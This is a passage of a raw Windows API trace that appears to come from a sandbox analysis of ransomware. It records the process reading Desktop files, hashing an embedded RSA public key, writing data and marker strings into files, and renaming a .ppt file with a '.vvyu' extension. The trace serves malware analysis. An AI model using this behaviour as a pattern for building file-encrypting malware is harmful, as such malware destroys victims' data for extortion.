RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0188.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0188.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0188.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d850 [0188.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0188.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0188.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0188.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d820 [0188.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0188.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d8f8 [0188.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0188.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d880 [0188.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d868 [0188.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d910 [0188.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d868 | out: hHeap=0x2c0000) returned 1 [0188.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d868 [0188.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d880 | out: hHeap=0x2c0000) returned 1 [0188.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0188.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0188.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0188.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d838 | out: hHeap=0x2c0000) returned 1 [0188.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d838 [0188.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2ae8018 [0188.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8e0 | out: hHeap=0x2c0000) returned 1 [0188.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0188.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d910 | out: hHeap=0x2c0000) returned 1 [0188.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2ae8228 [0188.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0188.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0188.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d838 | out: hHeap=0x2c0000) returned 1 [0188.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2ae8440 [0188.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0188.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0188.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0188.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0188.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0188.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0188.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0188.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8228 | out: hHeap=0x2c0000) returned 1 [0188.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8440 | out: hHeap=0x2c0000) returned 1 [0188.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d868 | out: hHeap=0x2c0000) returned 1 [0188.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8f8 | out: hHeap=0x2c0000) returned 1 [0188.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d850 | out: hHeap=0x2c0000) returned 1 [0188.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d820 | out: hHeap=0x2c0000) returned 1 [0188.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0188.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0188.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0188.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d7f0 | out: hHeap=0x2c0000) returned 1 [0188.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2068 | out: hHeap=0x2c0000) returned 1 [0188.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8018 | out: hHeap=0x2c0000) returned 1 [0188.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0188.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0188.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0188.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0188.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0188.161] WriteFile (in: hFile=0x584, lpBuffer=0x2ae3ea0*, nNumberOfBytesToWrite=0x416c, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ae3ea0*, lpNumberOfBytesWritten=0x2f9fb14*=0x416c, lpOverlapped=0x0) returned 1 [0188.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.162] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x4171, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.162] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0188.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0188.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0188.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2ae3ea0 [0188.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ae3ea0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2ae42d0 [0188.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0188.163] WriteFile (in: hFile=0x584, lpBuffer=0x2ae42d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae42d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0188.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae42d0 | out: hHeap=0x2c0000) returned 1 [0188.164] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.164] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0188.164] CloseHandle (hObject=0x584) returned 1 [0188.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0188.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2ae3ea0 [0188.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0188.166] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\A85pj5GgBuiXXfuVCW4.ppt" (normalized: "c:\\users\\keecfmwgj\\desktop\\a85pj5ggbuixxfuvcw4.ppt"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\A85pj5GgBuiXXfuVCW4.ppt.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\a85pj5ggbuixxfuvcw4.ppt.vvyu")) returned 1 [0188.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.167] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0188.172] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1d93b80, ftCreationTime.dwHighDateTime=0x1d89a4e, ftLastAccessTime.dwLowDateTime=0x36bce340, ftLastAccessTime.dwHighDateTime=0x1d89fe7, ftLastWriteTime.dwLowDateTime=0x36bce340, ftLastWriteTime.dwHighDateTime=0x1d89fe7, nFileSizeHigh=0x0, nFileSizeLow=0x2c3b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Bkw1.mp4", cAlternateFileName="")) returned 1 [0188.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2068 [0188.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ed40 [0188.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2068 | out: hHeap=0x2c0000) returned 1 [0188.172] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\Bkw1.mp4") returned=".mp4" [0188.172] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Bkw1.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\bkw1.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.173] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=11323) returned 1 [0188.173] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0188.177] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x2c15, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.177] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0188.178] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.178] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x2c3b, lpOverlapped=0x0) returned 1 [0188.178] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0188.178] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.178] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.178] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0188.181] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0188.181] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.181] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0188.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0188.181] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0188.181] GetLastError () returned 0x0 [0188.181] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0188.181] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0188.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.181] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0188.181] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0188.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.181] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0188.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c40) returned 0x2ae3ea0 [0188.182] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0188.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0188.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0188.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2068 [0188.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d7f0 [0188.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2020 [0188.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d820 [0188.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d850 [0188.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d8f8 [0188.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d868 [0188.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0188.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2f5b18 [0188.183] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2f5b18, Size=0x218) returned 0x2ae6ae8 [0188.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2ae6d08 [0188.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d850 | out: hHeap=0x2c0000) returned 1 [0188.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d868 | out: hHeap=0x2c0000) returned 1 [0188.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8f8 | out: hHeap=0x2c0000) returned 1 [0188.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0188.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6d08 | out: hHeap=0x2c0000) returned 1 [0188.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d8f8 [0188.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0188.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d868 [0188.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0188.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0d850 [0188.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0188.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0188.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0188.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0188.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0188.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0188.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0188.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d868 | out: hHeap=0x2c0000) returned 1 [0188.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d850 | out: hHeap=0x2c0000) returned 1 [0188.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8f8 | out: hHeap=0x2c0000) returned 1 [0188.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0188.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ae8 | out: hHeap=0x2c0000) returned 1 [0188.186] GetCurrentThreadId () returned 0x5d8 [0188.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0188.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ee140 [0188.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0188.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0188.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0188.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0188.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.186] GetCurrentThreadId () returned 0x5d8 [0188.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0188.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.187] HeapFree (in: 